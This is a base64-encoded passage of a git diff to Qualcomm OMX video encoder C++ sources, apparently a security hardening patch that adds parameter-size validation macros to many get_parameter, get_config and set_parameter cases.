gICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygiZ2V0X3BhcmFtZXRlcjogT01YX1Fjb21JbmRleFBhcmFtVmlkZW9MVFJDb3VudCIpOwogICAgICAgICAgICAgICAgIE9NWF9RQ09NX1ZJREVPX1BBUkFNX0xUUkNPVU5UX1RZUEUgKnBQYXJhbSA9CiAgICAgICAgICAgICAgICAgICAgICAgICByZWludGVycHJldF9jYXN0PE9NWF9RQ09NX1ZJREVPX1BBUkFNX0xUUkNPVU5UX1RZUEUqPihwYXJhbURhdGEpOwpAQCAtMTc4MSw2ICsxODA2LDcgQEAKICNlbmRpZgogICAgICAgICBjYXNlIFFPTVhfSW5kZXhQYXJhbVZpZGVvU3ludGF4SGRyOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9FWFROSU5ERVhfUEFSQU1UWVBFKTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9ISUdIKCJRT01YX0luZGV4UGFyYW1WaWRlb1N5bnRheEhkciIpOwogICAgICAgICAgICAgICAgIFFPTVhfRVhUTklOREVYX1BBUkFNVFlQRSogcFBhcmFtID0KICAgICAgICAgICAgICAgICAgICAgcmVpbnRlcnByZXRfY2FzdDxRT01YX0VYVE5JTkRFWF9QQVJBTVRZUEUqPihwYXJhbURhdGEpOwpAQCAtMTgyNiw2ICsxODUyLDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4SGllcmFyY2hpY2FsU3RydWN0dXJlOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9WSURFT19ISUVSQVJDSElDQUxMQVlFUlMpOwogICAgICAgICAgICAgICAgIFFPTVhfVklERU9fSElFUkFSQ0hJQ0FMTEFZRVJTKiBoaWVycCA9IChRT01YX1ZJREVPX0hJRVJBUkNISUNBTExBWUVSUyopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9wYXJhbWV0ZXI6IE9NWF9RY29tSW5kZXhIaWVyYXJjaGljYWxTdHJ1Y3R1cmUiKTsKICAgICAgICAgICAgICAgICBtZW1jcHkoaGllcnAsICZtX3NIaWVyTGF5ZXJzLCBzaXplb2YobV9zSGllckxheWVycykpOwpAQCAtMTgzMyw2ICsxODYwLDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1QZXJmTGV2ZWw6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUUNPTV9WSURFT19QQVJBTV9QRVJGX0xFVkVMKTsKICAgICAgICAgICAgICAgICBPTVhfVTMyIHBlcmZsZXZlbDsKICAgICAgICAgICAgICAgICBPTVhfUUNPTV9WSURFT19QQVJBTV9QRVJGX0xFVkVMICpwUGFyYW0gPQogICAgICAgICAgICAgICAgICAgICByZWludGVycHJldF9jYXN0PE9NWF9RQ09NX1ZJREVPX1BBUkFNX1BFUkZfTEVWRUwqPihwYXJhbURhdGEpOwpAQCAtMTg0Nyw2ICsxODc1LDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1IMjY0VlVJVGltaW5nSW5mbzoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9RQ09NX1ZJREVPX1BBUkFNX1ZVSV9USU1JTkdfSU5GTyk7CiAgICAgICAgICAgICAgICAgT01YX1UzMiBlbmFibGVkOwogICAgICAgICAgICAgICAgIE9NWF9RQ09NX1ZJREVPX1BBUkFNX1ZVSV9USU1JTkdfSU5GTyAqcFBhcmFtID0KICAgICAgICAgICAgICAgICAgICAgcmVpbnRlcnByZXRfY2FzdDxPTVhfUUNPTV9WSURFT19QQVJBTV9WVUlfVElNSU5HX0lORk8qPihwYXJhbURhdGEpOwpAQCAtMTg2MSw2ICsxODkwLDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1QZWFrQml0cmF0ZToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9RQ09NX1ZJREVPX1BBUkFNX1BFQUtfQklUUkFURSk7CiAgICAgICAgICAgICAgICAgT01YX1UzMiBwZWFrYml0cmF0ZTsKICAgICAgICAgICAgICAgICBPTVhfUUNPTV9WSURFT19QQVJBTV9QRUFLX0JJVFJBVEUgKnBQYXJhbSA9CiAgICAgICAgICAgICAgICAgICAgIHJlaW50ZXJwcmV0X2Nhc3Q8T01YX1FDT01fVklERU9fUEFSQU1fUEVBS19CSVRSQVRFKj4ocGFyYW1EYXRhKTsKQEAgLTE4NzUsNiArMTkwNSw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgICBjYXNlIFFPTVhfSW5kZXhQYXJhbVZpZGVvSW5pdGlhbFFwOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9FWFROSU5ERVhfVklERU9fSU5JVElBTFFQKTsKICAgICAgICAgICAgICAgICAgUU9NWF9FWFROSU5ERVhfVklERU9fSU5JVElBTFFQKiBpbml0cXAgPQogICAgICAgICAgICAgICAgICAgICAgcmVpbnRlcnByZXRfY2FzdDxRT01YX0VYVE5JTkRFWF9WSURFT19JTklUSUFMUVAgKj4ocGFyYW1EYXRhKTsKICAgICAgICAgICAgICAgICAgICAgIG1lbWNweShpbml0cXAsICZtX3NQYXJhbUluaXRxcCwgc2l6ZW9mKG1fc1BhcmFtSW5pdHFwKSk7CkBAIC0xOTM0LDE4ICsxOTY1LDIxIEBACiAgICAgc3dpdGNoICgoaW50KWNvbmZpZ0luZGV4KSB7CiAgICAgICAgIGNhc2UgT01YX0luZGV4Q29uZmlnVmlkZW9CaXRyYXRlOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKGNvbmZpZ0RhdGEsIE9NWF9WSURFT19DT05GSUdfQklUUkFURVRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19DT05GSUdfQklUUkFURVRZUEUqIHBQYXJhbSA9IHJlaW50ZXJwcmV0X2Nhc3Q8T01YX1ZJREVPX0NPTkZJR19CSVRSQVRFVFlQRSo+KGNvbmZpZ0RhdGEpOwogICAgICAgICAgICAgICAgIG1lbWNweShwUGFyYW0sICZtX3NDb25maWdCaXRyYXRlLCBzaXplb2YobV9zQ29uZmlnQml0cmF0ZSkpOwogICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9JbmRleENvbmZpZ1ZpZGVvRnJhbWVyYXRlOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKGNvbmZpZ0RhdGEsIE9NWF9DT05GSUdfRlJBTUVSQVRFVFlQRSk7CiAgICAgICAgICAgICAgICAgT01YX0NPTkZJR19GUkFNRVJBVEVUWVBFKiBwUGFyYW0gPSByZWludGVycHJldF9jYXN0PE9NWF9DT05GSUdfRlJBTUVSQVRFVFlQRSo+KGNvbmZpZ0RhdGEpOwogICAgICAgICAgICAgICAgIG1lbWNweShwUGFyYW0sICZtX3NDb25maWdGcmFtZXJhdGUsIHNpemVvZihtX3NDb25maWdGcmFtZXJhdGUpKTsKICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhDb25maWdDb21tb25Sb3RhdGU6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEoY29uZmlnRGF0YSwgT01YX0NPTkZJR19ST1RBVElPTlRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9DT05GSUdfUk9UQVRJT05UWVBFKiBwUGFyYW0gPSByZWludGVycHJldF9jYXN0PE9NWF9DT05GSUdfUk9UQVRJT05UWVBFKj4oY29uZmlnRGF0YSk7CiAgICAgICAgICAgICAgICAgbWVtY3B5KHBQYXJhbSwgJm1fc0NvbmZpZ0ZyYW1lUm90YXRpb24sIHNpemVvZihtX3NDb25maWdGcmFtZVJvdGF0aW9uKSk7CiAgICAgICAgICAgICAgICAgYnJlYWs7CkBAIC0xOTUzLDEyICsxOTg3LDE0IEBACiAgICAgICAgIGNhc2UgUU9NWF9JbmRleENvbmZpZ1ZpZGVvSW50cmFwZXJpb2Q6CiAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfY29uZmlnOlFPTVhfSW5kZXhDb25maWdWaWRlb0ludHJhcGVyaW9kIik7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEoY29uZmlnRGF0YSwgUU9NWF9WSURFT19JTlRSQVBFUklPRFRZUEUpOwogICAgICAgICAgICAgICAgIFFPTVhfVklERU9fSU5UUkFQRVJJT0RUWVBFKiBwUGFyYW0gPSByZWludGVycHJldF9jYXN0PFFPTVhfVklERU9fSU5UUkFQRVJJT0RUWVBFKj4oY29uZmlnRGF0YSk7CiAgICAgICAgICAgICAgICAgbWVtY3B5KHBQYXJhbSwgJm1fc0ludHJhcGVyaW9kLCBzaXplb2YobV9zSW50cmFwZXJpb2QpKTsKICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhDb25maWdWaWRlb0FWQ0ludHJhUGVyaW9kOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKGNvbmZpZ0RhdGEsIE9NWF9WSURFT19DT05GSUdfQVZDSU5UUkFQRVJJT0QpOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19DT05GSUdfQVZDSU5UUkFQRVJJT0QgKnBQYXJhbSA9CiAgICAgICAgICAgICAgICAgICAgIHJlaW50ZXJwcmV0X2Nhc3Q8T01YX1ZJREVPX0NPTkZJR19BVkNJTlRSQVBFUklPRCo+KGNvbmZpZ0RhdGEpOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygiZ2V0X2NvbmZpZzogT01YX0luZGV4Q29uZmlnVmlkZW9BVkNJbnRyYVBlcmlvZCIpOwpAQCAtMTk2Nyw2ICsyMDAzLDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhDb25maWdDb21tb25EZWludGVybGFjZToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBPTVhfVklERU9fQ09ORklHX0RFSU5URVJMQUNFKTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fQ09ORklHX0RFSU5URVJMQUNFICpwUGFyYW0gPQogICAgICAgICAgICAgICAgICAgICByZWludGVycHJldF9jYXN0PE9NWF9WSURFT19DT05GSUdfREVJTlRFUkxBQ0UqPihjb25maWdEYXRhKTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9jb25maWc6IE9NWF9JbmRleENvbmZpZ0NvbW1vbkRlaW50ZXJsYWNlIik7CkBAIC0xOTc1LDYgKzIwMTIsNyBAQAogICAgICAgICAgICAgfQogICAgICAgIGNhc2UgT01YX0luZGV4Q29uZmlnVmlkZW9WcDhSZWZlcmVuY2VGcmFtZToKICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKGNvbmZpZ0RhdGEsIE9NWF9WSURFT19WUDhSRUZFUkVOQ0VGUkFNRVRZUEUpOwogICAgICAgICAgICAgICAgT01YX1ZJREVPX1ZQOFJFRkVSRU5DRUZSQU1FVFlQRSogcFBhcmFtID0KICAgICAgICAgICAgICAgICAgICByZWludGVycHJldF9jYXN0PE9NWF9WSURFT19WUDhSRUZFUkVOQ0VGUkFNRVRZUEUqPihjb25maWdEYXRhKTsKICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygiZ2V0X2NvbmZpZzogT01YX0luZGV4Q29uZmlnVmlkZW9WcDhSZWZlcmVuY2VGcmFtZSIpOwpAQCAtMTk4Myw2ICsyMDIxLDcgQEAKICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9RY29tSW5kZXhDb25maWdQZXJmTGV2ZWw6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEoY29uZmlnRGF0YSwgT01YX1FDT01fVklERU9fQ09ORklHX1BFUkZfTEVWRUwpOwogICAgICAgICAgICAgICAgIE9NWF9VMzIgcGVyZmxldmVsOwogICAgICAgICAgICAgICAgIE9NWF9RQ09NX1ZJREVPX0NPTkZJR19QRVJGX0xFVkVMICpwUGFyYW0gPQogICAgICAgICAgICAgICAgICAgICByZWludGVycHJldF9jYXN0PE9NWF9RQ09NX1ZJREVPX0NPTkZJR19QRVJGX0xFVkVMKj4oY29uZmlnRGF0YSk7CmRpZmYgLS1naXQgYS9tbS12aWRlby12NGwyL3ZpZGMvdmVuYy9zcmMvb214X3ZpZGVvX2VuY29kZXIuY3BwIGIvbW0tdmlkZW8tdjRsMi92aWRjL3ZlbmMvc3JjL29teF92aWRlb19lbmNvZGVyLmNwcAppbmRleCBhNzJlMDdlLi43MGQ2MjYwIDEwMDY0NAotLS0gYS9tbS12aWRlby12NGwyL3ZpZGMvdmVuYy9zcmMvb214X3ZpZGVvX2VuY29kZXIuY3BwCisrKyBiL21tLXZpZGVvLXY0bDIvdmlkYy92ZW5jL3NyYy9vbXhfdmlkZW9fZW5jb2Rlci5jcHAKQEAgLTU3Nyw2ICs1NzcsNyBAQAogICAgIHN3aXRjaCAoKGludClwYXJhbUluZGV4KSB7CiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1Qb3J0RGVmaW5pdGlvbjoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9QQVJBTV9QT1JUREVGSU5JVElPTlRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9QQVJBTV9QT1JUREVGSU5JVElPTlRZUEUgKnBvcnREZWZuOwogICAgICAgICAgICAgICAgIHBvcnREZWZuID0gKE9NWF9QQVJBTV9QT1JUREVGSU5JVElPTlRZUEUgKikgcGFyYW1EYXRhOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X3BhcmFtZXRlcjogT01YX0luZGV4UGFyYW1Qb3J0RGVmaW5pdGlvbiBIPSAlZCwgVyA9ICVkIiwKQEAgLTY3Niw2ICs2NzcsNyBAQAogCiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1WaWRlb1BvcnRGb3JtYXQ6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfVklERU9fUEFSQU1fUE9SVEZPUk1BVFRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19QQVJBTV9QT1JURk9STUFUVFlQRSAqcG9ydEZtdCA9CiAgICAgICAgICAgICAgICAgICAgIChPTVhfVklERU9fUEFSQU1fUE9SVEZPUk1BVFRZUEUgKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJzZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbVZpZGVvUG9ydEZvcm1hdCAlZCIsCkBAIC03MTksNiArNzIxLDcgQEAKICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtVmlkZW9Jbml0OgogICAgICAgICAgICAgeyAvL1RPRE8sIGRvIHdlIG5lZWQgdGhpcyBpbmRleCBzZXQgcGFyYW0KKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9QT1JUX1BBUkFNX1RZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9QT1JUX1BBUkFNX1RZUEUqIHBQYXJhbSA9IChPTVhfUE9SVF9QQVJBTV9UWVBFKikocGFyYW1EYXRhKTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coIlNldCBPTVhfSW5kZXhQYXJhbVZpZGVvSW5pdCBjYWxsZWQiKTsKICAgICAgICAgICAgICAgICBicmVhazsKQEAgLTcyNiw2ICs3MjksNyBAQAogCiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1WaWRlb0JpdHJhdGU6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfVklERU9fUEFSQU1fQklUUkFURVRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19QQVJBTV9CSVRSQVRFVFlQRSogcFBhcmFtID0gKE9NWF9WSURFT19QQVJBTV9CSVRSQVRFVFlQRSopcGFyYW1EYXRhOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X3BhcmFtZXRlcjogT01YX0luZGV4UGFyYW1WaWRlb0JpdHJhdGUiKTsKICAgICAgICAgICAgICAgICBpZiAoaGFuZGxlLT52ZW5jX3NldF9wYXJhbShwYXJhbURhdGEsT01YX0luZGV4UGFyYW1WaWRlb0JpdHJhdGUpICE9IHRydWUpIHsKQEAgLTc0Miw2ICs3NDYsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtVmlkZW9NcGVnNDoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9WSURFT19QQVJBTV9NUEVHNFRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19QQVJBTV9NUEVHNFRZUEUqIHBQYXJhbSA9IChPTVhfVklERU9fUEFSQU1fTVBFRzRUWVBFKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgT01YX1ZJREVPX1BBUkFNX01QRUc0VFlQRSBtcDRfcGFyYW07CiAgICAgICAgICAgICAgICAgbWVtY3B5KCZtcDRfcGFyYW0sIHBQYXJhbSwgc2l6ZW9mKHN0cnVjdCBPTVhfVklERU9fUEFSQU1fTVBFRzRUWVBFKSk7CkBAIC03OTUsNiArODAwLDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVZpZGVvQXZjOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1ZJREVPX1BBUkFNX0FWQ1RZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19QQVJBTV9BVkNUWVBFKiBwUGFyYW0gPSAoT01YX1ZJREVPX1BBUkFNX0FWQ1RZUEUqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fQVZDVFlQRSBhdmNfcGFyYW07CiAgICAgICAgICAgICAgICAgbWVtY3B5KCZhdmNfcGFyYW0sIHBQYXJhbSwgc2l6ZW9mKCBzdHJ1Y3QgT01YX1ZJREVPX1BBUkFNX0FWQ1RZUEUpKTsKQEAgLTg1NCw2ICs4NjAsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIChPTVhfSU5ERVhUWVBFKU9NWF9JbmRleFBhcmFtVmlkZW9WcDg6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfVklERU9fUEFSQU1fVlA4VFlQRSk7CiAgICAgICAgICAgICAgICAgT01YX1ZJREVPX1BBUkFNX1ZQOFRZUEUqIHBQYXJhbSA9IChPTVhfVklERU9fUEFSQU1fVlA4VFlQRSopcGFyYW1EYXRhOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19QQVJBTV9WUDhUWVBFIHZwOF9wYXJhbTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coInNldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtVmlkZW9WcDgiKTsKQEAgLTg3MCw2ICs4NzcsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIChPTVhfSU5ERVhUWVBFKU9NWF9JbmRleFBhcmFtVmlkZW9IZXZjOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1ZJREVPX1BBUkFNX0hFVkNUWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fSEVWQ1RZUEUqIHBQYXJhbSA9IChPTVhfVklERU9fUEFSQU1fSEVWQ1RZUEUqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fSEVWQ1RZUEUgaGV2Y19wYXJhbTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coInNldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtVmlkZW9IZXZjIik7CkBAIC04ODMsNiArODkxLDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVZpZGVvUHJvZmlsZUxldmVsQ3VycmVudDoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9WSURFT19QQVJBTV9QUk9GSUxFTEVWRUxUWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fUFJPRklMRUxFVkVMVFlQRSogcFBhcmFtID0gKE9NWF9WSURFT19QQVJBTV9QUk9GSUxFTEVWRUxUWVBFKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJzZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbVZpZGVvUHJvZmlsZUxldmVsQ3VycmVudCIpOwogICAgICAgICAgICAgICAgIGlmIChoYW5kbGUtPnZlbmNfc2V0X3BhcmFtKHBQYXJhbSxPTVhfSW5kZXhQYXJhbVZpZGVvUHJvZmlsZUxldmVsQ3VycmVudCkgIT0gdHJ1ZSkgewpAQCAtOTM3LDYgKzk0Niw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1TdGFuZGFyZENvbXBvbmVudFJvbGU6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUEFSQU1fQ09NUE9ORU5UUk9MRVRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9QQVJBTV9DT01QT05FTlRST0xFVFlQRSAqY29tcF9yb2xlOwogICAgICAgICAgICAgICAgIGNvbXBfcm9sZSA9IChPTVhfUEFSQU1fQ09NUE9ORU5UUk9MRVRZUEUgKikgcGFyYW1EYXRhOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X3BhcmFtZXRlcjogT01YX0luZGV4UGFyYW1TdGFuZGFyZENvbXBvbmVudFJvbGUgJXMiLApAQCAtMTAwNyw2ICsxMDE3LDcgQEAKIAogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtUHJpb3JpdHlNZ210OgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1BSSU9SSVRZTUdNVFRZUEUpOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X3BhcmFtZXRlcjogT01YX0luZGV4UGFyYW1Qcmlvcml0eU1nbXQiKTsKICAgICAgICAgICAgICAgICBpZiAobV9zdGF0ZSAhPSBPTVhfU3RhdGVMb2FkZWQpIHsKICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfRVJST1IoIkVSUk9SOiBTZXQgUGFyYW1ldGVyIGNhbGxlZCBpbiBJbnZhbGlkIFN0YXRlIik7CkBAIC0xMDI3LDYgKzEwMzgsNyBAQAogCiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1Db21wQnVmZmVyU3VwcGxpZXI6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUEFSQU1fQlVGRkVSU1VQUExJRVJUWVBFKTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coInNldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtQ29tcEJ1ZmZlclN1cHBsaWVyIik7CiAgICAgICAgICAgICAgICAgT01YX1BBUkFNX0JVRkZFUlNVUFBMSUVSVFlQRSAqYnVmZmVyU3VwcGxpZXJUeXBlID0gKE9NWF9QQVJBTV9CVUZGRVJTVVBQTElFUlRZUEUqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJzZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbUNvbXBCdWZmZXJTdXBwbGllciAlZCIsCkBAIC0xMDQzLDYgKzEwNTUsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtVmlkZW9RdWFudGl6YXRpb246CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfVklERU9fUEFSQU1fUVVBTlRJWkFUSU9OVFlQRSk7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJzZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbVZpZGVvUXVhbnRpemF0aW9uIik7CiAgICAgICAgICAgICAgICAgT01YX1ZJREVPX1BBUkFNX1FVQU5USVpBVElPTlRZUEUgKnNlc3Npb25fcXAgPSAoT01YX1ZJREVPX1BBUkFNX1FVQU5USVpBVElPTlRZUEUqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgaWYgKHNlc3Npb25fcXAtPm5Qb3J0SW5kZXggPT0gUE9SVF9JTkRFWF9PVVQpIHsKQEAgLTEwNjEsNiArMTA3NCw3IEBACiAKICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb1FQUmFuZ2U6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUUNPTV9WSURFT19QQVJBTV9RUFJBTkdFVFlQRSk7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJzZXRfcGFyYW1ldGVyOiBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb1FQUmFuZ2UiKTsKICAgICAgICAgICAgICAgICBPTVhfUUNPTV9WSURFT19QQVJBTV9RUFJBTkdFVFlQRSAqcXBfcmFuZ2UgPSAoT01YX1FDT01fVklERU9fUEFSQU1fUVBSQU5HRVRZUEUqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgaWYgKHFwX3JhbmdlLT5uUG9ydEluZGV4ID09IFBPUlRfSU5ERVhfT1VUKSB7CkBAIC0xMDc5LDYgKzEwOTMsNyBAQAogCiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleFBvcnREZWZuOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1FDT01fUEFSQU1fUE9SVERFRklOSVRJT05UWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfUUNPTV9QQVJBTV9QT1JUREVGSU5JVElPTlRZUEUqIHBQYXJhbSA9CiAgICAgICAgICAgICAgICAgICAgIChPTVhfUUNPTV9QQVJBTV9QT1JUREVGSU5JVElPTlRZUEUqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coInNldF9wYXJhbWV0ZXI6IE9NWF9RY29tSW5kZXhQb3J0RGVmbiIpOwpAQCAtMTEwNSw2ICsxMTIwLDcgQEAKIAogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtVmlkZW9FcnJvckNvcnJlY3Rpb246CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfVklERU9fUEFSQU1fRVJST1JDT1JSRUNUSU9OVFlQRSk7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJPTVhfSW5kZXhQYXJhbVZpZGVvRXJyb3JDb3JyZWN0aW9uIik7CiAgICAgICAgICAgICAgICAgT01YX1ZJREVPX1BBUkFNX0VSUk9SQ09SUkVDVElPTlRZUEUqIHBQYXJhbSA9CiAgICAgICAgICAgICAgICAgICAgIChPTV